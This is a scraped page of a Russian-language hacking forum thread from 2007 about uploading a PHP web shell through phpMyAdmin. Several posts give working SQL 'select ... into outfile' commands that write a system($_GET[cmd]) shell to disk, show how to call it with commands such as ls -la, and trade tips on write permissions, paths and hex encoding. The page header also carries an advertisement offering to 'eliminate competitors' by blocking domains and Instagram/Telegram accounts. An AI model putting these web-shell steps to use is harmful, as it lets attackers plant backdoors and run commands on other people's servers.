УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
phpMyAdmin

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

26.12.2007, 17:16

Ershik

Постоянный

Регистрация: 07.11.2007

Сообщений: 392

Провел на форуме:
1325167

Репутация: 100

Обратил. Дальше что? Должен появиться веб шелл по адресе http://sait.ru/phpBB/index.php ? Пробовал. Его там нет.

#22

26.12.2007, 17:22

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

Отправить сообщение для AFoST с помощью ICQ

Во-первых должны быть права на запись. Во-вторых узнай полный путь до этой директории.
//локалхост

Код:

select "<?system($_GET[cmd])?>" into outfile '/home/localhost/www/shell.php';

Потом обращяешься к шеллу так http://localhost/shell.php?cmd=ls -la

Последний раз редактировалось AFoST; 27.12.2007 в 01:11.. Причина: убрал ковычки 'cmd'

#23

26.12.2007, 17:24

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

не надо там в кавычки ничего обрамлять
переведи этот пшп код в хекс например, ты вообще увеерн что у тебя права есть на запись файлов?

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#24

26.12.2007, 23:11

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

Провел на форуме:
4839935

Репутация: 1202

Отправить сообщение для Elekt с помощью ICQ

Цитата:

Сообщение от Spyder

хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'

по синтаксису sql необходимым условием является:
~ указание существующей таблицы
~ абсолютный путь к файлу
~ обрамление ковычками абсолютного пути к файлу, что как следствие требует magic_quotes=OFF либо stripslashes запроса

.. и тот кто реально хоть раз грузил так шелл, должен был это знать...

PHP код:


		
			
select '<?system($_GET[cmd])?>' from table_name_blaaaahh  into outfile '/путь/к/шеллу.php'

#25

26.12.2007, 23:31

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Elekt, забыл код обрамить в кавычки
Я имел ввиду что надо делать так $_GET[cmd], а не так $_GET['cmd']
А вот про указание существующей таблицы - глупость
Я у себя на локалке с успехом выполнял запрос select 1 into outfile '/tmp/123.txt'

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 26.12.2007 в 23:35..

Страница 3 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Кодировка в PhpMyAdmin	Ershik	PHP, PERL, MySQL, JavaScript	10	28.12.2007 10:54
Error in simple exploit phpMyAdmin	am@tory	Уязвимости	11	12.12.2007 05:05
Как залить шелл через PhpMyAdmin?	Buga	Форумы	15	16.02.2006 22:18
Залить remview.php через phpMyAdmin	Grom	PHP, PERL, MySQL, JavaScript	8	05.02.2006 00:19
phpmyadmin	dyx	Болталка	1	27.04.2005 17:04

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход